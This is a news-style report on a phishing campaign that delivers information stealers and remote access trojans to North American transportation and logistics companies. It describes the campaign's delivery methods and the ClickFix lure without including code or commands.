Transportation and logistics companies in North America are facing a significant threat from a new phishing campaign that has been delivering a range of information stealers and remote access trojans (RATs). According to an analysis by Proofpoint, the campaign exploits compromised legitimate email accounts belonging to transportation and shipping firms, injecting malicious content into ongoing email conversations to deceive recipients. So far, at least 15 breached accounts have been identified, although the exact methods of infiltration and the identity of the attackers remain unclear.
The primary malicious payloads identified in the attacks include Lumma Stealer, StealC, and NetSupport, which were predominantly deployed from May to July 2024. In August 2024, the threat actors shifted their tactics, utilizing new infrastructure and delivery methods to introduce additional payloads such as DanaBot and Arechclient2. The attack chains often involve phishing emails that contain internet shortcut (.URL) attachments or Google Drive links leading to malicious files. Once these files are launched, they use Server Message Block (SMB) protocols to retrieve subsequent malware from remote servers.
In some variants of the campaign, attackers have adopted a technique known as ClickFix, which tricks victims into downloading DanaBot malware under the pretext of fixing a document display issue in their web browsers. This method typically involves urging users to copy and paste a Base64-encoded PowerShell script into their terminal, triggering the infection process. The targeting of transportation firms is further demonstrated by the impersonation of software specifically designed for fleet and freight operations, including brands like Samsara, AMB Logistic, and Astra TMS. This suggests that the attackers conduct thorough research into their targets before launching their campaigns.
The rise of these cyberattacks is indicative of a broader trend in the information-stealing malware landscape, which has seen the emergence of various new strains. Alongside the notable stealer malware such as Angry Stealer and BLX Stealer, the recent activities underscore the pressing need for enhanced cybersecurity measures within the transportation sector. As threat actors become more sophisticated in their tactics and approaches, companies must remain vigilant and invest in robust security protocols to safeguard sensitive information against evolving cyber threats.
